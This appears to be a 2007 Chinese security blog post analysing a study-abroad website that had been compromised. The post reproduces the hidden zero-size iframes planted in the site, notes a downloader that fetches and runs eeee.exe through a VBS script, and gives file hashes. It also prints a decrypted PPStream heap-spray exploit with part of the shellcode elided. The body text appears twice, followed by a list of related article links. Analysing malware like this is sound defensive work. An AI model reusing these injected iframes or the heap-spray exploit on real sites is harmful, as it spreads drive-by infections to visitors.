某留学网站被植入利用 PPStream 堆栈漏洞的代码
2007-09-30 17:57
260 查看
某留学网站被植入利用 PPStream 堆栈漏洞的代码
endurer 原创
2007-09-30 第1版
网站被植入代码:
/---
<iframe src=hxxp://xxx.7**45*97**0.com/newdm/new05.htm?075 width=0 height=0></iframe>
---/
hxxp://xxx.7**45*97**0.com/newdm/new05.htm?075 包含代码:
/---
<iframe width='0' height='0' src='hxxp://xxx.7**45*97**0.com/wm/014.htm'></iframe>
<iframe width='0' height='0' src='hxxp://xxx.7**45*97**0.com/wm/pps.htm'></iframe>
---/
hxxp://xxx.7**45*97**0.com/wm/014.htm 下载 hxxp://down.d*j**7*78*8.cn/eeee.exe,创建 eeee.vbs 来实现运行。
文件说明符 : D:/test/eeee.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-9-30 17:35:3
修改时间 : 2007-9-30 17:34:56
访问时间 : 2007-9-30 17:36:41
大小 : 18944 字节 18.512 KB
MD5 : 711db0f8a651b3877db9febfa4060cdb
HSA1: ECA7F2889F07E04257575EEEAC9AB30F97EC7311
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
hxxp://xxx.7**45*97**0.com/wm/pps.htm 是一段加密过的 PPStream 堆栈漏洞利用代码,解密后为:
/---
var newcode=unescape("%u00E8%u0000%u6A00%uEB……%u776f%u2e6e%u6a64%u3737%u3838%u632e%u2f6e%u7070%u2e73%u7865%u0065");bigblock=unescape("%u9090");headersize=20;slackspace=headersize+newcode.length;while(bigblock.length<slackspace)bigblock+=bigblock;fillblock=bigblock.substring(0,slackspace);block=bigblock.substring(0,bigblock.length-slackspace);while(block.length+slackspace<0x40000)block=block+block+fillblock;memory=new Array();for(x=0;x<400;x++)memory[x]=block+newcode;var buffer='\x0a';while(buffer.length<500)buffer+='\x0a\x0a\x0a\x0a';ppc.Logo=buffer;
---/
endurer 原创
2007-09-30 第1版
网站被植入代码:
/---
<iframe src=hxxp://xxx.7**45*97**0.com/newdm/new05.htm?075 width=0 height=0></iframe>
---/
hxxp://xxx.7**45*97**0.com/newdm/new05.htm?075 包含代码:
/---
<iframe width='0' height='0' src='hxxp://xxx.7**45*97**0.com/wm/014.htm'></iframe>
<iframe width='0' height='0' src='hxxp://xxx.7**45*97**0.com/wm/pps.htm'></iframe>
---/
hxxp://xxx.7**45*97**0.com/wm/014.htm 下载 hxxp://down.d*j**7*78*8.cn/eeee.exe,创建 eeee.vbs 来实现运行。
文件说明符 : D:/test/eeee.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-9-30 17:35:3
修改时间 : 2007-9-30 17:34:56
访问时间 : 2007-9-30 17:36:41
大小 : 18944 字节 18.512 KB
MD5 : 711db0f8a651b3877db9febfa4060cdb
HSA1: ECA7F2889F07E04257575EEEAC9AB30F97EC7311
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
hxxp://xxx.7**45*97**0.com/wm/pps.htm 是一段加密过的 PPStream 堆栈漏洞利用代码,解密后为:
/---
var newcode=unescape("%u00E8%u0000%u6A00%uEB……%u776f%u2e6e%u6a64%u3737%u3838%u632e%u2f6e%u7070%u2e73%u7865%u0065");bigblock=unescape("%u9090");headersize=20;slackspace=headersize+newcode.length;while(bigblock.length<slackspace)bigblock+=bigblock;fillblock=bigblock.substring(0,slackspace);block=bigblock.substring(0,bigblock.length-slackspace);while(block.length+slackspace<0x40000)block=block+block+fillblock;memory=new Array();for(x=0;x<400;x++)memory[x]=block+newcode;var buffer='\x0a';while(buffer.length<500)buffer+='\x0a\x0a\x0a\x0a';ppc.Logo=buffer;
---/
相关文章推荐
- 某论坛新游试玩区被植入利用ANI漏洞传播 Trojan.Mnless.kip 的代码
- 某光集团网站被加入利用ANI漏洞传播Worm.Win32.Viking.ix的代码
- 某县农业网被植入利用暴风影音2缓冲区溢出等漏洞的恶意代码
- 某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码
- 某易论坛被植入利用ANI漏洞传播 Backdoor.Win32.Agent.ahj 的代码
- ThinkPHP框架任意代码执行漏洞的利用及其修复方法
- 利用phpcms后台漏洞渗透某色情网站
- PHP168 V6.02 整站系统远程执行任意代码漏洞利用
- 小议yxbbs漏洞利用代码
- 利用最新struts2远程执行命令漏洞渗透网站的演示
- Foxit Reader XFA setInterval释放后重利用代码执行漏洞(CVE-2018-17628)
- 利用Acunetix WVS进行批量网站漏洞评估
- 分享一个网站网站防火墙。功能说明:防护XSS,SQL,代码执行,文件包含等多种高危漏洞
- PHP代码网站如何防范SQL注入漏洞攻击建议分享
- 黑客如何利用文件包含漏洞进行网站入侵
- OFFICE漏洞挂马利用代码
- Windows Live的@live.com域名注册漏洞 利用代码
- 某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
- 利用nginx向现有网站添加登录验证功能(不添加修改现有网站代码)
- PHP代码网站如何防范SQL注入漏洞攻击建议